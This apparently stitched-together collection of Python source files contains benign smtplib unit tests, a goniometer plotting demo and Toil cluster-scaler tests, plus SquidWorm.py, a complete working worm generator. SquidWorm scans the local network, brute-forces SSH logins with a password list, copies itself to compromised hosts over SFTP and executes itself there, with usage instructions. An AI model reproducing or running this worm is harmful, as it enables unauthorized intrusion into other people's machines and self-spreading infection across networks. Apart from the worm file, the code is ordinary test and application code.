serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <fő[email protected]>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'fő[email protected]')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
main.py
|
from goniometer import biometrics_library, axis, OLI
import ctypes
import tkinter as tk
from tkinter import Frame
import tkinter.font as font
from tkinter.constants import LEFT
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
from matplotlib.animation import FuncAnimation
import threading
import numpy as np
class Application_demo():
def __init__(self):
#-------------------- Control variables--------------------
self.data_collection_status = False
self.time_window = 15
self.time_window_ovf_count = 0
#----------------------- Goniometer -----------------------
self.dll_path = "OnLineInterface64.dll"
self.biometrics_library = biometrics_library.Biometrics_library(self.dll_path)
self.sample_rate = 100
self.axes = [axis.Axis(0, self.sample_rate), axis.Axis(1, self.sample_rate)]
#------------- Graphic User Interface variables------------
self.window = tk.Tk()
self.window.title("Biometrics Twin Axis Goniometer Python application demo")
matplotlib.use("TkAgg")
# Buttons frame
self.frame_button = Frame(self.window)
# START/STOP button
self.myFont = font.Font(family='Helvetica', size=20, weight='bold')
self.btn_start = tk.Button(self.frame_button, text = "START", font = self.myFont, command = lambda: self.start_stop_data_collection())
self.btn_reload_library = tk.Button(self.frame_button, text = "Reload library", font = self.myFont, command = lambda: self.reload_library())
self.btn_start.pack(padx = 10, pady = 5, side = LEFT)
self.btn_reload_library.pack(padx = 10, pady = 5, side = LEFT)
# Plot frame
self.frame_plot = Frame(self.window)
# Figure, plot and canvas
self.f = Figure(figsize=(10,7), dpi=100)
self.subplot = self.f.add_subplot(111)
self.subplot.grid()
self.subplot.set_ylim(-180,180)
self.subplot.set_xlim(0, self.time_window)
self.line1, = self.subplot.plot([], [], lw=2, color = "red")
self.line2, = self.subplot.plot([], [], lw=2, color = "green")
self.canvas = FigureCanvasTkAgg(self.f, self.frame_plot)
self.canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
self.frame_button.pack()
self.frame_plot.pack()
# Initial instances of thread and animation function
self.ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.thread = threading.Thread(name="data_collection_thread", daemon=True, target=self.data_collection, args=(self.ani,))
# This method is used to reload the Biometrics library as shown in "biometrics_library.py"
def reload_library(self):
self.biometrics_library = biometrics_library.Biometrics_library(self.dll_path)
# This method is called when START/STOP button is pressed
def start_stop_data_collection(self):
if not self.data_collection_status:
if self.biometrics_library.OnLineInterface64:
self.btn_start.configure(text="STOP")
self.data_collection_status = True
# Clear axes output data
self.axes[0].output.clear()
self.axes[0].seconds = 0
self.axes[1].output.clear()
self.axes[1].seconds = 0
# prepare plot
self.subplot.clear()
self.subplot.grid()
self.subplot.set_ylim(-180,180)
self.subplot.set_xlim(0, self.time_window)
self.time_window_ovf_count = 0
if not self.thread.is_alive():
#ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.line1.set_data([], [])
self.line2.set_data([], [])
# Concurrent instances of thread and animation function
self.ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.thread = threading.Thread(name="data_collection_thread", daemon=True, target=self.data_collection, args=(self.ani,))
self.thread.start()
else:
print("The previous experiment did not end correctly. Please, restart the application.")
else:
print("The Biometrics OnlineInterface64.dll library did not load correctly. Please, open the Biometrics DataLite application, turn off the save file mode and press the ''Reload library'' button.")
else:
self.data_collection_status = False
self.btn_start.configure(text="START")
# This method is executed in a separated thread to start data collection from the 2 axis of the goniometer
def data_collection(self, ani):
for axis in self.axes:
# Empty axes memory buffer before start data collection
self.biometrics_library.empty_buffer(axis)
# Initialize some variables
axis.zeroSamplesCounter = 0
axis.seconds = 0
# Start Data Collection in Biometrics DataLite application to get some data before plotting it
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_START, ctypes.byref(axis.pStatus))
while self.data_collection_status:
for axis in self.axes:
# Take the number of available samples in the memory buffer for each axis
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_GETSAMPLES, ctypes.byref(axis.pStatus))
axis.samplesInBuffer = axis.pStatus.value
# If an error occurs, the value of the variable containing the number of available samples will be negative
if (axis.samplesInBuffer < 0):
print(f'OnLineStatus ONLINE_GETSAMPLES returned: {axis.samplesInBuffer}')
break
# No samples available
if (axis.samplesInBuffer == 0):
axis.zeroSamplesCounter += 1
if (axis.zeroSamplesCounter > 100000):
print("Did you switch on the sensor and turned off the save file mode on Biometrics DataLite application?")
break
# Samples vailable
else:
axis.zeroSamplesCounter = 0
if axis.samplesInBuffer > OLI.MAX_SAMPLES: # this is the samples limit explained in data_structure.py
axis.samplesInBuffer = OLI.MAX_SAMPLES
# Calculate the miliseconds to read from the memory buffer using the samples available in this buffer and the sample rate
mStoGet = round(axis.samplesInBuffer * 1000 / axis.sampleRate)
# Increment the seconds during which this axis has been receiving data
axis.seconds += round(mStoGet/1000, 5)
# Recalculate the samples available in the memory buffer using the calculated miliseconds
axis.samplesInBuffer = round(mStoGet * axis.sampleRate / 1000)
# Initialize this variable
axis.dataStructure.contents.cDims = 0
# call OnlineGetData to get the samples
# Note that some arguments are parsed into ctypes data types, as this function is contained in a .dll file
self.biometrics_library.OnLineGetData(axis.channel, ctypes.c_int(mStoGet), ctypes.byref(axis.dataStructure), ctypes.byref(axis.pDataNum))
# Get the number of samples received after calling the "OnLineGetData" function
numberOfSamplesReceived = axis.pDataNum.value
# remove the 10 first values as they are not angles, just metadata
raw_output = list(axis.dataStructure.contents.pvData)[10:(10 + numberOfSamplesReceived)]
# convert the angles from -4000,4000 to -180,180
fixed_output = [round(value*(180/4000), 1) for value in raw_output if value in range(-4000,4000)]
# Store the fixed values into the output variable for each axis
axis.output.extend(fixed_output)
# Stop the plot animation
ani.event_source.stop()
# Call OnLineStatus with "OLI.ONLINE_STOP" to stop receiving data from the sensor
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_STOP, ctypes.byref(axis.pStatus))
# This method is an animation that plots in real time the values received from the goniometer axes
def animate(self, i):
# time window overflow control
if(self.axes[0].seconds > self.time_window * (self.time_window_ovf_count + 1)):
self.time_window_ovf_count += 1
self.subplot.set_xlim([self.time_window * self.time_window_ovf_count, self.time_window * (self.time_window_ovf_count+1)])
# The vertical axis data of the plot will be the output data of the goniometers axes, already fixed and parsed from -4000,4000 into -180,180 as shown in "data_collection" function
y1 = np.array(self.axes[0].output)
y2 = np.array(self.axes[1].output)
# The horizontal axis data of the plot will be the time of each goniometer axis
x1 = np.linspace(0, self.axes[0].seconds, y1.size)
x2 = np.linspace(0, self.axes[1].seconds, y2.size)
self.line1.set_data(x1, y1)
self.line2.set_data(x2, y2)
return self.line1, self.line2
# Create an instance of Application_demo class
application_demo = Application_demo()
# Run the Graphic User Interface
application_demo.window.mainloop()
|
SquidWorm.py
|
from optparse import OptionParser
import os, sys
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
self.get_args()
def genscript(self):
script = """
import paramiko, os, socket, threading, sys, time
print('''
_____ _ _ __ __ __ ___
/ ____| (_) | | \ \ / / /_ | / _ \
| (___ __ _ _ _ _ __| |_____\ \ /\ / /__ _ __ _ __ ___ | || | | |
\___ \ / _` | | | | |/ _` |______\ \/ \/ / _ \| '__| '_ ` _ \ | || | | |
____) | (_| | |_| | | (_| | \ /\ / (_) | | | | | | | | | || |_| |
|_____/ \__, |\__,_|_|\__,_| \/ \/ \___/|_| |_| |_| |_| |_(_)___/
| |
|_|
Script By DrSquid
This worm Spreads over local networks and exploits port 22.''')
class Marker:
def __init__(self, ip="0.0.0.0", port=42069):
self.ip = ip
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.ip, self.port))
self.listener = threading.Thread(target=self.listen)
self.listener.start()
def listen(self):
while True:
try:
self.sock.listen()
conn, ip = self.sock.accept()
time.sleep(1)
conn.send("I have been infected with a worm.".encode())
conn.close()
except:
pass
class Worm:
def __init__(self, filetobecloned,victimfilename,passw_file,cfg_file=None):
self.own_ip = "192.168.0.115"
self.cfg_file = cfg_file
self.has_cfg = False
if self.cfg_file != None:
self.cfg_contents, self.ls_contents = self.cfg(self.cfg_file)
self.os_ls = ['windows','apple','linux']
self.ips = os.popen('arp -a').readlines()
self.possiblevictims = self.identify_victims()
self.passwords_cracked = 0
self.passwords_scanned = 0
self.clonefile = filetobecloned
self.fileonvictim = victimfilename
self.passw_file = passw_file
self.victims = []
self.ips_scanned = 0
print(f"[+] List of Possible Hosts: {self.possiblevictims}")
print("[+] Do CRTL+C To stop the script.")
print("\\n[+] Initiating Port Scan.....")
self.passwords = self.obtain_passw()
self.port_scanner = threading.Thread(target=self.begin_port_scan)
self.port_scanner.start()
def cfg(self, filename):
file = open(filename, "r")
contents = file.read()
file.close()
file = open(filename, "r")
ls_contents = file.readlines()
file.close()
if "CFGFORWORM" in contents:
self.has_cfg = True
print("[+] A Config file has been provided.")
return contents, ls_contents
else:
return None
def initiate_threads(self):
self.laster = threading.Thread(target=self.output_item)
self.laster.start()
while True:
try:
if self.ips_scanned == len(self.possiblevictims):
if len(self.victims) == 0:
print("\\n[+] No Hosts with Port 22 Open.")
else:
for ip in self.victims:
if self.has_cfg:
if ip in self.cfg_contents:
if ip not in self.victims:
print(f"[+] {ip} is in config file, but not in victim list.\n[+] Ignoring.........")
else:
for line in self.ls_contents:
if ip in line:
try:
ipcfg = line.split()
try:
username = ipcfg[1]
except:
username = "root"
try:
opsys = ipcfg[2]
if opsys not in self.os_ls:
opsys = "windows"
except:
opsys = "windows"
except:
pass
else:
username = "root"
opsys = "windows"
else:
username = "root"
opsys = "windows"
victim = threading.Thread(target=self.victimlogin, args=(ip, username, opsys))
victim.start()
break
except:
pass
def begin_port_scan(self):
for ip in self.possiblevictims:
try:
print(f"\\n[+] Scanning {ip}.....")
portscanner = threading.Thread(target=self.port_scan, args=(ip,))
portscanner.start()
except:
pass
self.initiate_threads()
def port_scan(self, ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 22))
self.victims.append(ip)
print(f"\\n[!] {ip} has 22 as an open Port.")
except:
print(f"\\n[+] {ip} does not have 22 as an open port.")
s.close()
self.ips_scanned += 1
def obtain_passw(self):
with open(self.passw_file, "r") as file:
passwords = file.readlines()
return passwords
def identify_victims(self):
victims = []
if sys.platform == "win32":
for lines in self.ips:
try:
line = lines.split()
ip = line[0]
checker = int(ip[0])
victims.append(ip)
except:
pass
elif sys.platform == "darwin":
for lines in self.ips:
try:
line = lines.split()
ip = line[1]
ip = ip.strip('()')
checker = int(ip[0])
victims.append(ip)
except:
pass
return victims
def output_item(self):
while True:
try:
pass
except:
pass
def victimlogin(self, ip, username="root", opsys="windows"):
infected = False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,42069))
msg = s.recv(1024).decode()
s.close()
infected = True
self.passwords_cracked += 1
self.passwords_scanned += 1
print(f"[!] {ip} has already been infected!")
except:
infected = False
if not infected:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to Brute Force Password for IP: {ip}")
flag = 0
for password in self.passwords:
try:
password = password.strip()
client.connect(ip, 22, username, password, auth_timeout=2)
flag = 1
break
except:
pass
if flag == 1:
self.passwords_cracked += 1
self.passwords_scanned += 1
print(f"\\n[!] {ip}'s Password has been Cracked!: {password}")
print(f"[!] Injecting file {self.clonefile} into Victim!")
sftp = client.open_sftp()
if opsys == 'apple':
sftp.put(self.clonefile, f"/Users/{username}/{self.fileonvictim}")
sftp.put(self.passw_file, f"/Users/{username}/{self.passw_file}")
if self.has_cfg:
sftp.put(self.cfg_file, f"/Users/{username}/{self.cfg_file}")
print(f"[!] Successfully Started {self.clonefile} On {ip}")
print(f"[+] If there is anything wrong with the connection, use: 'ssh {username}@{ip}' and procceed with: '{password}'")
if self.fileonvictim.endswith('.py'):
stdin, stdout, stderr = client.exec_command(
f"python3 /Users/{username}/{self.fileonvictim}")
stdin.close()
else:
stdin, stdout, stderr = client.exec_command(f"open /Users/{username}/{self.fileonvictim}")
stdin.close()
else:
sftp.put(self.clonefile, f"C:/Users/{username}/{self.fileonvictim}")
sftp.put(self.passw_file, f"C:/Users/{username}/{self.passw_file}")
if self.has_cfg:
sftp.put(self.cfg_file, f"C:/Users/{username}/{self.cfg_file}")
print(f"[!] File May Have been started on {ip}(Cmd command may have not been passed).")
print(f"[!] You can try logging into the Computer with cmd: ssh {username}@{ip}")
print(f"[!] And proceed with Password: {password}")
if self.fileonvictim.endswith('.py'):
stdin, stdout, stderr = client.exec_command(
f"python3 C:/Users/{username}/{self.fileonvictim}")
stdin.close()
else:
stdin, stdout, stderr = client.exec_command(f"start /B C:/Users/{username}/{self.fileonvictim}")
stdin.close()
client.close()
else:
print(f"\\n[?] {ip}'s Password was unable to be cracked.")
self.passwords_scanned += 1
marker = Marker()
worm = Worm("""+self.filename+""", """+self.filename+""", """+self.passlist+""", """+self.config+""")
"""
return script
def usage(self):
print("""
_____ _ _ __ __ __ ___
/ ____| (_) | | \ \ / / /_ | / _ \
| (___ __ _ _ _ _ __| |_____\ \ /\ / /__ _ __ _ __ ___ | || | | |
\___ \ / _` | | | | |/ _` |______\ \/ \/ / _ \| '__| '_ ` _ \ | || | | |
____) | (_| | |_| | | (_| | \ /\ / (_) | | | | | | | | | || |_| |
|_____/ \__, |\__,_|_|\__,_| \/ \/ \___/|_| |_| |_| |_| |_(_)___/
| |
|_|
Worm By DrSquid
This worm Spreads over local networks and exploits port 22.
[+] Option-Parsing Help:
[+] --pL, --passlist - Specifies the Brute-Forcing SSH File.
[+] --cF, --config - Specifies the config file for customized brute forcing.
[+] --fN, --filename - Specifies the name of the file created once brute forcing is successful.
[+] Note: The file that goes onto the remote computer will be the worm.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 SquidWorm.py --pL <passlist> --fN <filename> --cf <cfgfile>")
print("[+] python3 SquidWorm.py --i")
else:
print("[+] SquidWorm --pL <passlist> --fN <filename> --cf <cfgfile>")
print("[+] SquidWorm --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--pL","--passlist",dest="passlist")
self.opts.add_option("--cF","--config",dest="config")
self.opts.add_option("--fN","--filename",dest="filename")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt = self.opts.parse_args()
if args.info is not None:
self.usage()
else:
pass
if args.passlist is None:
self.usage()
else:
self.passlist = args.passlist
if args.config is None:
self.config = None
else:
self.config = args.config
if args.filename is None:
self.filename = "Worm.py"
else:
self.filename = args.filename
script = self.genscript()
file = open(self.filename,"w")
file.write(script)
file.close()
os.startfile(file.name)
optionparse = OptionParse()
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
try:
# In Python 3 we can use a SimpleNamespace as a mock provisioner
self.provisioner = types.SimpleNamespace()
except:
# In Python 2 we can just tack fields onto an object
self.provisioner = object()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
